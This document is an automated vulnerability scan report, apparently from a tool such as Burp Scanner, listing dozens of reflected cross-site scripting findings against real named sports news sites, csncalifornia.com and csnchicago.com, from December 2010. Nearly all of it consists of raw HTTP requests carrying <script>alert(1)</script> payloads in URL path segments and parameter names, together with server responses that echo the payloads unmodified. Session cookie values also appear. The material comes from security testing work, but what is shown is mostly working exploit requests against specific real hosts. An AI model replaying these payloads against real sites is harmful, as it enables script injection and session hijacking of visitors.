GET /12/17/10c24c3"><script>alert(1)</script>c3d877227e/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 35830
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10c24c3"><script>alert(1)</script>c3d877227e/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e040b"><script>alert(1)</script>789aa30996e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/img-srchttpcsnbayareacomcommonglobal_imae040b"><script>alert(1)</script>789aa30996e/landing_ratto_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 35831
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10/img-srchttpcsnbayareacomcommonglobal_imae040b"><script>alert(1)</script>789aa30996e/landing_ratto_v3.html"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3923"><script>alert(1)</script>acbc9e62deb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12c3923"><script>alert(1)</script>acbc9e62deb/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12c3923"><script>alert(1)</script>acbc9e62deb/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88f07"><script>alert(1)</script>1832d58f02c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/1988f07"><script>alert(1)</script>1832d58f02c/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/1988f07"><script>alert(1)</script>1832d58f02c/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63da3"><script>alert(1)</script>5b4a5dabb83 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/1063da3"><script>alert(1)</script>5b4a5dabb83/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19/1063da3"><script>alert(1)</script>5b4a5dabb83/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb769"><script>alert(1)</script>64364a421db was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-oveeb769"><script>alert(1)</script>64364a421db/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51798
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-oveeb769"><script>alert(1)</script>64364a421db/landing.html"> ...[SNIP]...
2.299. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32759"><script>alert(1)</script>463a885a6be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html?32759"><script>alert(1)</script>463a885a6be=1 HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51651
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="32759"><script>alert(1)</script>463a885a6be" id = "32759"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac172"><script>alert(1)</script>0408d2ed618 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12ac172"><script>alert(1)</script>0408d2ed618/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51798
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12ac172"><script>alert(1)</script>0408d2ed618/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dfb3"><script>alert(1)</script>f17ff8cf738 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/197dfb3"><script>alert(1)</script>f17ff8cf738/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/197dfb3"><script>alert(1)</script>f17ff8cf738/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9592b"><script>alert(1)</script>a5a8ccaaf27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/109592b"><script>alert(1)</script>a5a8ccaaf27/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19/109592b"><script>alert(1)</script>a5a8ccaaf27/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac109"><script>alert(1)</script>146cc501890 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowlac109"><script>alert(1)</script>146cc501890/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51798
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowlac109"><script>alert(1)</script>146cc501890/landing.html"> ...[SNIP]...
2.304. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d514c"><script>alert(1)</script>7a3c3d8fef0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html?d514c"><script>alert(1)</script>7a3c3d8fef0=1 HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51651
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="d514c"><script>alert(1)</script>7a3c3d8fef0" id = "d514c"> ...[SNIP]...
2.305. http://www.csncalifornia.com/pages/profiles [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csncalifornia.com
Path:
/pages/profiles
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f15e"><script>alert(1)</script>2593eca35fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/profiles?1f15e"><script>alert(1)</script>2593eca35fe=1 HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 52903
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="1f15e"><script>alert(1)</script>2593eca35fe" id = "1f15e"> ...[SNIP]...
2.306. http://www.csncalifornia.com/pages/video [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csncalifornia.com
Path:
/pages/video
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6762"><script>alert(1)</script>c3145f829ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/video?c6762"><script>alert(1)</script>c3145f829ec=1 HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 76146
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="c6762"><script>alert(1)</script>c3145f829ec" id = "c6762"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f4b1a<script>alert(1)</script>8c0a2cde489 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/12/10/Blackhawks-Bowman-opens-up-to-CSNs-Boden/landing.htmlf4b1a<script>alert(1)</script>8c0a2cde489 HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:57 GMT Content-Length: 816 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/12/10/Blackhawks-Bowman-opens-up-to-CSNs-Boden/landing.htmlf4b1a<script>alert(1)</script>8c0a2cde489"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a6387<script>alert(1)</script>8d7c05fd3a3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/15/10/Noah-needs-surgery-could-miss-10-weeks/landing_bulls.htmla6387<script>alert(1)</script>8d7c05fd3a3 HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:01 GMT Content-Length: 820 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/15/10/Noah-needs-surgery-could-miss-10-weeks/landing_bulls.htmla6387<script>alert(1)</script>8d7c05fd3a3"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b1513<script>alert(1)</script>632e19a2daf was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.htmlb1513<script>alert(1)</script>632e19a2daf HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:09 GMT Content-Length: 819 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.htmlb1513<script>alert(1)</script>632e19a2daf"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 99ab8<script>alert(1)</script>9b0201d0528 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/10/bHawks-911bbrKane-Hossa-etc-Hawks-using-/landing.html99ab8<script>alert(1)</script>9b0201d0528 HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:08 GMT Content-Length: 816 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/16/10/bHawks-911bbrKane-Hossa-etc-Hawks-using-/landing.html99ab8<script>alert(1)</script>9b0201d0528"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 712ca<script>alert(1)</script>a6471d6df31 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Bears-to-practice-at-Northwestern-to-pre/landing_insider_john_moon_mullin.html712ca<script>alert(1)</script>a6471d6df31 HTTP/1.1 Host: www.csnchicago.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:21 GMT Content-Length: 841 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Bears-to-practice-at-Northwestern-to-pre/landing_insider_john_moon_mullin.html712ca<script>alert(1)</script>a6471d6df31"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9a563<script>alert(1)</script>f1f018dae53 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
